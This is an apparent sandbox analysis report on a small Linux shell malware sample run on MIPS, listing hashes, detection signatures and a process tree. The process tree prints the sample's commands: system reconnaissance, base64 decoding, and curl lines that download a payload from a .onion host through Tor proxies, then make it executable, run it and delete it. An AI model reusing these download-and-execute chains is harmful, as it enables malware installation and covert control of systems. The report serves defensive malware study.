Analysis

  • max time kernel
    87s
  • max time network
    155s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    24/10/2024, 18:05

General

  • Target

    74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

  • Size

    1KB

  • MD5

    74accae8c7e0093939ab4e0cd1c2a7fd

  • SHA1

    ae3b26988c72634e3f0daeb6486332530ba58324

  • SHA256

    d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea

  • SHA512

    7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 16 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 7 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
    1⤵
      PID:699
      • /bin/bash
        bash
        2⤵
        • Writes file to tmp directory
        PID:707
        • /usr/bin/cut
          cut -d: -f6
          3⤵
            PID:713
          • /usr/bin/id
            id -u
            3⤵
            • Reads runtime system information
            PID:715
          • /bin/grep
            grep x:0: /etc/passwd
            3⤵
              PID:712
            • /usr/bin/head
              head -n 1 /tmp/.X11-unix/01
              3⤵
                PID:721
              • /bin/ls
                ls /proc//status
                3⤵
                • Reads runtime system information
                PID:723
              • /bin/chmod
                chmod +x ./i
                3⤵
                • File and Directory Permissions Modification
                PID:725
              • /tmp/i
                ./i
                3⤵
                • Executes dropped EXE
                PID:727
              • /bin/rm
                rm -f i
                3⤵
                  PID:728
                • /bin/grep
                  grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
                  3⤵
                    PID:734
                  • /usr/bin/tr
                    tr " " "\\n"
                    3⤵
                      PID:735
                    • /usr/bin/sort
                      sort -uR
                      3⤵
                        PID:737
                      • /bin/grep
                        grep -Ev "[.]0"
                        3⤵
                          PID:736
                        • /usr/bin/head
                          head -n 1
                          3⤵
                            PID:738
                          • /usr/bin/curl
                            curl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"
                            3⤵
                            • Reads runtime system information
                            PID:733
                          • /bin/uname
                            uname -m
                            3⤵
                              PID:747
                            • /bin/date
                              date
                              3⤵
                                PID:750
                              • /usr/bin/md5sum
                                md5sum
                                3⤵
                                  PID:751
                                • /usr/bin/cut
                                  cut -f1 -d-
                                  3⤵
                                    PID:752
                                  • /usr/bin/curl
                                    curl -4fsSLk checkip.amazonaws.com
                                    3⤵
                                    • Reads runtime system information
                                    • System Network Configuration Discovery
                                    PID:755
                                  • /usr/bin/whoami
                                    whoami
                                    3⤵
                                      PID:760
                                    • /bin/uname
                                      uname -m
                                      3⤵
                                        PID:761
                                      • /bin/uname
                                        uname -n
                                        3⤵
                                          PID:762
                                        • /sbin/ip
                                          ip a
                                          3⤵
                                          • System Network Configuration Discovery
                                          PID:764
                                        • /bin/grep
                                          grep "inet "
                                          3⤵
                                            PID:765
                                          • /usr/bin/md5sum
                                            md5sum
                                            3⤵
                                              PID:767
                                            • /usr/bin/awk
                                              awk "{print \$1}"
                                              3⤵
                                              • Reads runtime system information
                                              PID:768
                                            • /usr/bin/awk
                                              awk "{print \$2}"
                                              3⤵
                                              • Reads runtime system information
                                              PID:766
                                            • /usr/bin/base64
                                              base64 -w0
                                              3⤵
                                                PID:771
                                              • /usr/bin/crontab
                                                crontab -l
                                                3⤵
                                                • Reads runtime system information
                                                PID:770
                                              • /usr/bin/curl
                                                curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_
                                                3⤵
                                                • Reads runtime system information
                                                • System Network Configuration Discovery
                                                PID:772
                                              • /usr/bin/curl
                                                curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_
                                                3⤵
                                                • Reads runtime system information
                                                • System Network Configuration Discovery
                                                PID:774
                                              • /bin/chmod
                                                chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
                                                3⤵
                                                • File and Directory Permissions Modification
                                                PID:779
                                              • /tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222
                                                ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
                                                3⤵
                                                  PID:780
                                                • /bin/rm
                                                  rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222
                                                  3⤵
                                                    PID:781
                                                  • /usr/bin/head
                                                    head -n 1 /tmp/.X11-unix/01
                                                    3⤵
                                                      PID:782
                                                    • /bin/ls
                                                      ls /proc//status
                                                      3⤵
                                                      • Reads runtime system information
                                                      PID:783
                                                    • /bin/grep
                                                      grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
                                                      3⤵
                                                        PID:788
                                                      • /usr/bin/tr
                                                        tr " " "\\n"
                                                        3⤵
                                                          PID:789
                                                        • /usr/bin/sort
                                                          sort -uR
                                                          3⤵
                                                            PID:791
                                                          • /usr/bin/head
                                                            head -n 1
                                                            3⤵
                                                              PID:792
                                                            • /usr/bin/curl
                                                              curl -4fsSLkA- -m200 "https://dns.twnic.tw/dns-query?name=relay.tor2socks.in"
                                                              3⤵
                                                              • Reads runtime system information
                                                              PID:787
                                                            • /bin/grep
                                                              grep -Ev "[.]0"
                                                              3⤵
                                                                PID:790
                                                              • /bin/uname
                                                                uname -m
                                                                3⤵
                                                                  PID:798
                                                                • /bin/date
                                                                  date
                                                                  3⤵
                                                                    PID:801
                                                                  • /usr/bin/md5sum
                                                                    md5sum
                                                                    3⤵
                                                                      PID:802
                                                                    • /usr/bin/cut
                                                                      cut -f1 -d-
                                                                      3⤵
                                                                        PID:803
                                                                      • /usr/bin/curl
                                                                        curl -4fsSLk checkip.amazonaws.com
                                                                        3⤵
                                                                        • Reads runtime system information
                                                                        • System Network Configuration Discovery
                                                                        PID:806
                                                                      • /usr/bin/whoami
                                                                        whoami
                                                                        3⤵
                                                                          PID:811
                                                                        • /bin/uname
                                                                          uname -m
                                                                          3⤵
                                                                            PID:812
                                                                          • /bin/uname
                                                                            uname -n
                                                                            3⤵
                                                                              PID:814
                                                                            • /sbin/ip
                                                                              ip a
                                                                              3⤵
                                                                              • System Network Configuration Discovery
                                                                              PID:816
                                                                            • /bin/grep
                                                                              grep "inet "
                                                                              3⤵
                                                                                PID:817
                                                                              • /usr/bin/md5sum
                                                                                md5sum
                                                                                3⤵
                                                                                  PID:819
                                                                                • /usr/bin/awk
                                                                                  awk "{print \$2}"
                                                                                  3⤵
                                                                                  • Reads runtime system information
                                                                                  PID:818
                                                                                • /usr/bin/awk
                                                                                  awk "{print \$1}"
                                                                                  3⤵
                                                                                  • Reads runtime system information
                                                                                  PID:820
                                                                                • /usr/bin/crontab
                                                                                  crontab -l
                                                                                  3⤵
                                                                                  • Reads runtime system information
                                                                                  PID:823
                                                                                • /usr/bin/base64
                                                                                  base64 -w0
                                                                                  3⤵
                                                                                    PID:824
                                                                                  • /usr/bin/curl
                                                                                    curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_
                                                                                    3⤵
                                                                                    • Reads runtime system information
                                                                                    • System Network Configuration Discovery
                                                                                    PID:826
                                                                                • /usr/bin/base64
                                                                                  base64 -d
                                                                                  2⤵
                                                                                  • Deobfuscate/Decode Files or Information
                                                                                  PID:706

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • /tmp/i

                                                                                Filesize

                                                                                5B

                                                                                MD5

                                                                                f4b524261fce06c1fbd10b4681ad0b97

                                                                                SHA1

                                                                                c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d

                                                                                SHA256

                                                                                9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031

                                                                                SHA512

                                                                                ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449